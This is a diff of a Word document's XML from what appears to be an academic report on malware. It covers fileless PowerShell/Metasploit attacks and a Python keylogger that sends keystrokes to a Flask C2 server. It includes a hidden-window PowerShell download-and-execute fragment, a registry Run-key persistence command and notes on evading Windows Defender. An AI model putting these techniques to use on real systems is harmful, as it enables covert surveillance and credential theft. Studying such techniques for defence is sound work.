         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>infrastructures when paired with a command-and-control server. Each study supports the conclusion that keyloggers are simple to build, hard to detect, and surprisingly adaptable.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>To validate these concepts, a keylogger was built and tested in a safe virtual machine. Using Python and pynput, the script captured keystrokes and sent them to a local Flask server every few seconds. The server recorded each input in real time, along with a timestamp. This mimicked the behavior described by Mourya et al. (2024), including live monitoring and log collection. The executable version of the keylogger was compiled using PyInstaller and tested against default Windows Defender, which failed to flag it. These observations confirmed the academic findings—especially regarding the effectiveness and low detectability of basic keyloggers.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>What makes keyloggers especially dangerous is how quietly they operate. Users don’t receive any alerts or see any signs of infection. Even system administrators may miss their presence unless they are specifically looking for unusual file writes, strange network activity, or unexpected registry changes. While keyloggers might not cause the immediate damage that ransomware does, they serve as a gateway—providing attackers with the exact information needed to move deeper into a network.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
         <w:t xml:space="preserve">In conclusion, keylogger-based malware shows that even the simplest tools can have powerful effects. When implemented well, they bypass security tools and remain unnoticed for long periods. Their role in initial access, surveillance, and credential theft continues to make them a valuable part of the modern attacker’s toolkit. Defenders must go beyond signature detection and focus on </w:t>
       </w:r>
       <w:r>
@@ -2211,7 +1989,7 @@
           <w:szCs w:val="34"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc194070984"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc194070984"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
@@ -2223,7 +2001,7 @@
         </w:rPr>
         <w:t>3.Implementation</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="7"/>
+      <w:bookmarkEnd w:id="9"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2237,7 +2015,7 @@
           <w:szCs w:val="26"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc194070985"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc194070985"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
@@ -2249,7 +2027,7 @@
         </w:rPr>
         <w:t>3.1 Fileless Malware Using PowerShell + Metasploit</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="8"/>
+      <w:bookmarkEnd w:id="10"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
@@ -2392,7 +2170,6 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Encrypted HTTPS reverse shell</w:t>
       </w:r>
     </w:p>
@@ -2558,6 +2335,7 @@
           <w:b/>
           <w:bCs/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>Command:</w:t>
       </w:r>
       <w:r>
@@ -2939,7 +2717,6 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">    Shell "powershell -nop -w hidden -c IEX (New-Object Net.WebClient</w:t>
       </w:r>
       <w:proofErr w:type="gramStart"/>
@@ -3151,7 +2928,7 @@
           <w:szCs w:val="34"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc194070986"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc194070986"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
@@ -3161,9 +2938,10 @@
           <w:sz w:val="34"/>
           <w:szCs w:val="34"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>3.2 Keylogger-Based Malware with C2</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="9"/>
+      <w:bookmarkEnd w:id="11"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
@@ -3356,149 +3134,149 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
+        <w:t>Persistence via registry key (Windows startup)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>Stealth: Hidden console window and delayed execution</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>Cross-platform testing with Flask as a lightweight C2 backend</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t xml:space="preserve">Implementation </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Steps</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>On the victim side, a Python script captures every keystroke using the pynput library. Each captured key is timestamped and encrypted using AES encryption before being sent via POST request to the Flask server. The script runs silently in the background and launches on every system boot by registering itself in the Windows registry.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>Keylogger Client Logic (Python – Victim)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>Captures all keystrokes using pynput</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>Encrypts keystrokes using symmetric AES encryption</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>Adds timestamps to each keystroke</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>Sends data to the C2 server at fixed intervals (e.g., every 10 seconds)</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>Persistence via registry key (Windows startup)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>Stealth: Hidden console window and delayed execution</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>Cross-platform testing with Flask as a lightweight C2 backend</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t xml:space="preserve">Implementation </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Steps</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>On the victim side, a Python script captures every keystroke using the pynput library. Each captured key is timestamped and encrypted using AES encryption before being sent via POST request to the Flask server. The script runs silently in the background and launches on every system boot by registering itself in the Windows registry.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>Keylogger Client Logic (Python – Victim)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>Captures all keystrokes using pynput</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>Encrypts keystrokes using symmetric AES encryption</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>Adds timestamps to each keystroke</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>Sends data to the C2 server at fixed intervals (e.g., every 10 seconds)</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
         <w:t>Starts silently on reboot using a Windows registry entry</w:t>
       </w:r>
     </w:p>
@@ -3917,132 +3695,150 @@
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>decrypted_text</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>decrypted_</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-        <w:t>}\n")</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Persistence Mechanism</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>To ensure the keylogger restarted with the system, a registry entry was added:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
+        <w:t>text</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
-      </w:pPr>
+        <w:t>}\</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
           <w:sz w:val="20"/>
           <w:szCs w:val="20"/>
         </w:rPr>
+        <w:t>n")</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Persistence Mechanism</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>To ensure the keylogger restarted with the system, a registry entry was added:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Cascadia Code" w:hAnsi="Cascadia Code" w:cs="Cascadia Code"/>
+          <w:sz w:val="20"/>
+          <w:szCs w:val="20"/>
+        </w:rPr>
+        <w:t>reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v SystemMonitor /t REG_SZ /d "C:\Users\&lt;user&gt;\AppData\Roaming\system_monitor.exe"</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>This allowed the keylogger to automatically relaunch after every system reboot without user interaction, replicating the persistence techniques discussed by Bhardwaj and Goundar (2020).</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Results &amp; Observations</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>The keylogger performed as expected, capturing and transmitting keystrokes with precise timestamps. The use of AES encryption ensured that even intercepted network traffic did not reveal cleartext inputs. The Flask server received and stored logs in near real time. No antivirus alerts were triggered during testing, particularly when the executable was obfuscated using PyInstaller with hidden window mode.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>These outcomes confirmed the observations made by Mourya et al. (2024), especially regarding the viability of encrypted, remote C2 structures. The stealth and persistence aspects also validated the attack patterns described in Bhardwaj and Goundar (2020), including registry-based startup and process invisibility.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
         <w:lastRenderedPageBreak/>
-        <w:t>reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v SystemMonitor /t REG_SZ /d "C:\Users\&lt;user&gt;\AppData\Roaming\system_monitor.exe"</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>This allowed the keylogger to automatically relaunch after every system reboot without user interaction, replicating the persistence techniques discussed by Bhardwaj and Goundar (2020).</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-          <w:b/>
-          <w:bCs/>
-        </w:rPr>
-        <w:t>Results &amp; Observations</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>The keylogger performed as expected, capturing and transmitting keystrokes with precise timestamps. The use of AES encryption ensured that even intercepted network traffic did not reveal cleartext inputs. The Flask server received and stored logs in near real time. No antivirus alerts were triggered during testing, particularly when the executable was obfuscated using PyInstaller with hidden window mode.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-        <w:t>These outcomes confirmed the observations made by Mourya et al. (2024), especially regarding the viability of encrypted, remote C2 structures. The stealth and persistence aspects also validated the attack patterns described in Bhardwaj and Goundar (2020), including registry-based startup and process invisibility.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
-        </w:rPr>
         <w:t>This implementation demonstrated how a basic Python script, when extended with realistic features, can become a full-fledged surveillance tool—capable of bypassing common detection and sustaining long-term access.</w:t>
       </w:r>
     </w:p>
@@ -4100,7 +3896,7 @@
           <w:szCs w:val="34"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc194070987"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc194070987"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
@@ -4112,7 +3908,7 @@
         </w:rPr>
         <w:t>4. Comparative Analysis</w:t>
       </w:r>
-      <w:bookmarkEnd w:id="10"/>
+      <w:bookmarkEnd w:id="12"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -4237,35 +4033,128 @@
         <w:rPr>
           <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
         </w:rPr>
-        <w:t xml:space="preserve">Fileless malware is engineered for stealth. By running entirely in memory and avoiding any interaction with disk storage, it evades traditional antivirus software and file-based scanning tools. As shown in the experiment, a PowerShell payload can be executed with a single </w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        <w:t>Fileless malware is engineered for stealth. By running entirely in memory and avoiding any interaction with disk storage, it evades traditional antivirus software and file-based scanning tools. As shown in the experiment, a PowerShell payload can be executed with a single obfuscated command, triggering a reverse shell without leaving a file behind. According to Sun et al. (2023), less than 12% of these attacks are detected during execution, highlighting their invisibility. However, setup requires moderate scripting knowledge and is often limited to systems with PowerShell or WMI access.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Strengths:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Extremely stealthy; avoids signature detection</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:br/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Weaknesses:</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Requires privileged PowerShell use and scripting skill</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Phishing-Based Credential Stealers</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Phishing remains one of the most successful attack vectors—not because of advanced code, but because it preys on human error. Even with modern training, users often fall for fake login screens when visual cues like logos and HTTPS are present (Bashir &amp; Papadopoulos, 2023). Credential stealers are incredibly easy to deploy using kits like </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>HiddenEye</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> or </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>SocialFish</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+        <w:t>. However, they are highly dependent on user action and cannot operate autonomously once detected.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
